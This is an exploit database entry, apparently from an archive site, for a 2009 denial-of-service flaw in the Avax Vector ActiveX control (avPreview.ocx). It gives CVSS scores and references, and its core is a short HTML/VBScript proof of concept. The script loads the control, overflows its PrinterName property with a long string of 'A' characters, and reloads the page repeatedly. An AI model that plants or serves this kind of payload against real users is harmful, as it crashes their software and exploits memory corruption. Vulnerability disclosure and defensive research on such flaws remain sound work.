Avax Vector ActiveX 1.3 (avPreview.ocx) Denial of Service Exploit

2009-07-06 / 2009-07-07
Credit: Satan hackers
Risk: Low
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Sec-r1z.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Vulnerabilities : Avax Vector ActiveX 1.3 (avPreview.ocx) Denial of Service Exploit Bug Hunter: Satan_Hackers (Satan_hackers_at_yahoo&#46;com) Greetz.: All Sec-r1z member's ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <html> <object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object> <script language='vbscript'> argCount = 1 arg1=String(10260, "A") target.PrinterName = arg1 </script> <script language='javascript'> document.location.reload() </script>

References:

http://www.securityfocus.com/bid/35583
http://www.securityfocus.com/archive/1/archive/1/504729/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top